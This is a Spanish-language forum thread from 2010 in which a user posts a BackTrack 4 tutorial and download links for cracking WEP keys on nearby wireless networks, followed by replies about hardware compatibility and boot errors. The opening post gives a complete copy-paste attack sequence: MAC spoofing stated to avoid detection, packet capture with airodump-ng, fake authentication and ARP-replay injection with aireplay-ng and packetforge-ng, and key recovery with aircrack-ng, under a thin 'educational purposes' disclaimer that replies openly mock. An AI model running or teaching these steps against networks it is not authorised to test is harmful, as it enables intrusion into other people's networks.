ClanGSM.com

Bienvenido, invitado ( Identificarse | Registrarse )

 
Reply to this topicStart new topic
Backtrack 4 Version Final Descifra Claves Wep, Descifra Claves Wep
Eliminado_anarquia89_*
mensaje Jan 22 2010, 10:30 PM
Publicado: #1




Invitados

Agradecimientos:







ahora les traigo la ultima version del backtrack 4 kon errores korregidos y mas kompatibilidad kon mas tarjetes de redes inalambrikas.

este aporte es especialmente para la raza de nextgameday,y espero ke les guste.


a continuacion les pongo el tutorial.
IMPORTANTE: ESTE TUTORIAL ES CON FINES EDUCATIVOS Y QUE SIRVA PARA PODER AUDITAR LA SEGURIDAD INALAMBRICA DE UN RED

Bueno antes que nada este es mi primer tutorial y hago este post ya que son pocos los tutoriales que estan en español y son un poco confusos, asi que lo voy a tratar de hacer de una forma que se pueda asimilar.

Hardware que yo utilice para realizar el tutorial:
Compaq v3618LA con tarjeta inalambrica Broadcom 4311
(NOTA: Verificar si tu tarjeta de red inalambrica es compatible con backtrack en el siguiente link: HCL:Wireless - Offensive-security.com
Software utilizado:
Live CD de BackTrack 4 (beta).


Cuando ya lo hayas bajado y quemado pues introduce el CD en tu cd-rom y reinicia la com****dora y has que se inicie desde el cd de backtrack)

cuando te pida usuario y contraseña usa los siguientes:
Usuario: root
Contraseña: toor
Introducelo todo en minusculas

Luego cuando ya todo cargue escribe lo siguiente:
startx
Esto es para que se inicie el modo grafico.

Cuando escuches el sonido de Mortal Kombat un "Finish Him!" es que ya cargo y esta listo para ser utilizado.

Bueno ahora viene lo bueno, abre una ventana de terminal (o consola) y escribe lo siguiente:
airmon-ng
Aqui te va a decir cual es tu tarjeta inalambrica, lo normal es que salga wlan0, o eth0, o eth1, cosas asi por el estilo, tu te vas a dar cuenta de cual es, en mi caso es la wlan0.

Luego introduce los siguientes comandos:
airmon-ng stop wlan0
ifconfig wlan0 down
Con esto deshabilitas la tarjeta de red inalambrica para hacerle un cambio de mac, este con dos razones importantes: 1. Para que asi no haya problemas de que te puedan detectar e impedirte futuras conexiones y 2. Vas a necesitar el numero de mac mas adelante y esta es una facil de escribir y recordar.

Para cambiar la mac escribe los sigueintes comandos:
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
Con el primer comando se cambio la mac de tu tarjeta de red por 00:11:22:33:44:55 y con el segundo habilitaste nuevamente tu tarjeta de red inalambrica (puede tardar un poco este ultimo comando)

Ahora vas a proceder a ver las redes inalambricas que estan a tu alcance con el siguiente comando:
airodump-ng wlan0
Va a salir la lista de las redes inalambricas, donde dice el BSSID (mac del router que da la señal), PWR (Poder de señal), CHN (Canal que se encuentra la red), ENCR (Es el tipo de contraseña que tiene la red, este tutorial es solo para WEP) y ESSID (Nombre de la red inalambrica).
Se que son mas datos los que se muestran, pero esos no son de importancia, solo vamos a utilizar los que mencione.

Cuando selecciones la red inalambrica que vamos a atacar apreta Ctrl + C para parar el proceso y con el mouse sombrea todo el BSSID de esa red y dale click derecho y copiar.
Para explicar bien esta parte vamos a poner un ejemplo:
BSSID
66:77:88:99:00:11
CHN
6
ESSID
ejemplo

Ahora para ponernos de modo monitor (para capturar paquetes) de esa red pon el siguiente comando:
airodump-ng -c 6 -w prueba --bssid 66:77:88:99:00:11 wlan0
Donde:
-c es el numero del canal de la red que estamos atacando
-w es el archivo donde se van a guardar los paquetes que captures (por defecto estan en la direccion /root)
--bssid es la mac del router de la red que estamos atacando
wlan0 es nuestra tarjeta inalambrica

Ahora que ya estas capturando datos veras que hay una parte que dice DATA, estos son los paquetes que llevamos capturados, para poder descifrar una wep es necesario 20,000 paquetes. Te daras cuenta que puede ir muy lento, esto significa que ninguna persona esta utilizando la red entonces no esta generando trafico y te podria llevar dias llegar a los 20,000 paquetes, pero no te preocupes que ahora te enseñare como generar trafico en la red.
Para inyectarle trafico a la red abre otra terminal (consola) donde introduciras los siguientes comandos:
aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 -e ejemplo wlan0
Donde:
-a es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
-e es el nombre de la red que estamos atacando

Luego cuando salgan 4 lineas de codigos y te diga que la conexion esta succesfuld, esto significa que estas conectado en capa 2 al router de la red que estamos atacando.
Si por alguna razon no se puede conectar algunas de las razones son las siguientes:
-La red a la que quieres atacar esta muy lejos
-Tu tarjeta de red no puede hacer inyeccion de paquetes
-El router tiene seguridad para evitar este tipo de ataques

Ahora para inyectarle el trafico introducce el siguientes comando:
aireplay-ng -3 -b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0
Donde:
-b es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
Veras que que se empezaron a inyectar paquetes, si vas a ver a la otra terminal donde estas capturando los paquetes te daras cuenta que la DATA va caminando muy rapido.

Ahora abre otra terminal (consola) e introduce el siguiente comando:
aircrack-ng prueba-01.cap
Donde:
-Prueba-01.cap es el archivo donde se estan capturando los datos
Deja que el comando se ejecute hasta que te diga un mensaje KEY FOUND!!, esto significa que la contraseña se a descifrado, y te la mostrara al lado derecho de la siguiente forma:
[XX:XX:XX:XX:XX:XX]
Donde las XX son las letras o numeros de la contraseña, por ejemplo:
Si te muestra [12:34:56:78:90]
La contraseña para esa red inalambrica seria 1234567890.

Bueno para aquellos que quieren probar aqui les pongo todos los comandos en el orden que debe de ser para que solo le den copiar:

# airmon-ng
# airmon-ng stop wlan0
# ifconfig wlan0 down
# macchanger –mac 00:11:22:33:44:55 wlan0
# airmon-ng start wlan0
# airodump-ng wlan0
# airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
# aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
# aircrack-ng nombredelarchivo.cap

Como se daran cuenta son pocos comandos pero llevan mucha explicacion y lo trate de hacer de una forma entendible, ya estoy trabajando en el video, asi que no se preocupen si no entienden, pronto voy a sacar el video donde igual voy a explicar los pasos.

Para aquellos que quieren probar otras formas de inyeccion aqui les dejo otras dos formas que me han funcionado perfecto:

Forma 2:
# aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
# aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (MAC) wlan0
Verificar si el BSSID es el que estamos atacando

Forma 3:
# aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
# aireplay-ng -5 -b <BSSID> -h <mac> wlan0
ver como se llama el archivo .xor
# packetforge-ng -0 -a <BSSID> -h <mac> -k 255.255.255.255 -l 255.255.255.255 -y <archivo .xor> -w ARP
# aireplay-ng -2 -r ARP wlan0


y aki los links

http://www.megaupload.com/?d=WA5YW3FN

http://www.megaupload.com/?d=ADVB46TG

Agradecer no cuesta nada.
Go to the top of the page
 
+Quote Post
A continuacion 10 usuario(s) le Agradece(n) a anarquia89 por su Colaboracion:
ALEXMISLE2, CuBan0, fenixwp, fernando colan, finisterra2008, guilloro, Motokiller, sebasrs, SoporteMovil, tornillo
finisterra2008
mensaje Jan 23 2010, 11:54 AM
Publicado: #2

Miembro del Clan
*

Grupo: Miembros
Mensajes: 245
Agradecimientos: 349
Registrado: 17-January 09
Desde: Spain
Miembro No.: 18,249



jejejej me gusto eso jejeje claro con FInes Educativosssss voy a probarlo !!
Go to the top of the page
 
+Quote Post
expulsado
mensaje Jan 23 2010, 12:07 PM
Publicado: #3

Gran Maestro del Clan
****

Grupo: Miembros
Mensajes: 1,545
Agradecimientos: 1830
Registrado: 22-January 09
Desde: ;)
Miembro No.: 18,945
Pais:cl


en buenan onda realmente lo haz probado ?????????o es copy paste.....aqui en el foro se han posteado una infinidad de soft para esa funcion pero ninguno a dado frutos....eso se ve por lo comentarios ...
Go to the top of the page
 
+Quote Post
Eliminado_anarquia89_*
mensaje Jan 23 2010, 02:46 PM
Publicado: #4




Invitados

Agradecimientos:





miren amigos yo lo he probado sacando claves wep pero pruebenlo y comenten y agradescan
Go to the top of the page
 
+Quote Post
Motokiller
mensaje Jan 23 2010, 03:01 PM
Publicado: #5

Maestro del Clan
***

Grupo: Miembros
Mensajes: 783
Agradecimientos: 3098
Registrado: 28-May 08
Desde: Mar del Plata
Miembro No.: 946
Pais:ar


Este soft se esta vendiendo en Argentina, viene con un modem wifi incluido smile.gif, realmente funciona, pero como viene sucediendo desde que se conocen este tipo de soft, el problema esta en la incopatibilidad de las placas de red. De todos modos, basta con que compremos alguna compatible y ya.


--------------------



IF U CAN DREAM IT. U CAN DO IT !

Go to the top of the page
 
+Quote Post
FixUpCenter
mensaje Jan 25 2010, 04:22 AM
Publicado: #6

Miembro del Clan
*

Grupo: Miembros
Mensajes: 183
Agradecimientos: 141
Registrado: 28-October 08
Desde: Morelia
Miembro No.: 10,344



Se usa cualquier computadora este live cd emula una instalacion de linux para poder arrancarles bajo cualquier sistema es booteable como cualquier S.O. solo que no se instala directamente al HDD
Go to the top of the page
 
+Quote Post
Eliminado_lealesdibua_*
mensaje May 19 2010, 06:17 AM
Publicado: #7




Invitados

Agradecimientos:





pues amigos qwien sabe decirme porqwe backtrack me pone error --server--111 y error server 33

tengo windows vista home premiun ,y lo pase a windows 7


y no termina de arrancar por ese error

desde usb

saludos mellow.gif
Go to the top of the page
 
+Quote Post
joe_camelo
mensaje May 19 2010, 06:56 PM
Publicado: #8

Colaborador del Clan
**

Grupo: Expulsados
Mensajes: 305
Agradecimientos: 218
Registrado: 5-December 08
Miembro No.: 13,315
Pais:ad


La verdad q no creo q influya q hayas migrado de S.O. pq despues de todo esto lo va iniciar antes de q se inicie si quiera el windows ..... debe ser un problema en el booteo seguro no lograste hacer q el USB sea booteable ,

checkea una vez el manual ,

saludos.
Go to the top of the page
 
+Quote Post
hectorvfp
mensaje May 19 2010, 07:20 PM
Publicado: #9

Colaborador del Clan
**

Grupo: Expulsados
Mensajes: 486
Agradecimientos: 635
Registrado: 5-August 09
Desde: Peru
Miembro No.: 51,975



tienes wifislax , wifiway , y bajo windows el mejor Erw


--------------------
Mis Herramientas:

SetoolFusion + Z3xBox + Vygis + InfinityBox + GpgDragon + SigmaKey + Ufs-3 + CycloneBox
Go to the top of the page
 
+Quote Post
Eliminado_juvictor23_*
mensaje May 19 2010, 11:50 PM
Publicado: #10




Invitados

Agradecimientos:





A como dice el colega de aca arriba si esos son los mas famosos desencriptadores de claves wifi pero hay como de costumbre una falla y esq tienes q estar cerca del router modem o lo q sea por lo q los datos no se transfieren a gran velocidad y otro detalle esq necesitas esperar mucho se rellenen al menos unos 10000 datos para determinar su clave y estos trabajan a fuerza bruta con unos famosos diccionarios q traen casi un millon de combinaciones de letras numeros asi q con paciencia todo se logra:) a mi me toco esperar casi un dia para sacar una clave wpa2 q son las mas complicadas y la incopatibilidad es cierto necesitan usar otros drivers de red q sean a modo monitor para poder escuchar en el canal todos los datos y un injector q hace la fuerza bruta muy bonito pero algo complejo en windows el erw son con la mayoria de toshiba q funcionan y es facil su uso
Go to the top of the page
 
+Quote Post
Eliminado_lealesdibua_*
mensaje May 20 2010, 06:06 AM
Publicado: #11




Invitados

Agradecimientos:





CITA(joe_camelo @ May 19 2010, 06:56 PM) *
La verdad q no creo q influya q hayas migrado de S.O. pq despues de todo esto lo va iniciar antes de q se inicie si quiera el windows ..... debe ser un problema en el booteo seguro no lograste hacer q el USB sea booteable ,

checkea una vez el manual ,

saludos.



si amigo lo hise con el programa unetbootin y probe con programas diferente y lo mismo se enciende backtrack en el inicio se enciende el logo y recoje datos pero alfinal pone qwe falta el server 111

y la berdad qwe me tiene jartito
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic
3 usuario(s) está(n) leyendo este tema (3 invitado(s) y 0 usuario(s) anónimo(s))
0 usuarios(s) registrado(s):

 



Ver Visitas Fecha y Hora actual: 23rd May 2026 - 08:19 AM
►Reglamento      ►Política de Privacidad
Este sitio web usa cookies, puedes ver la política de cookies, aquí -
Política de cookies +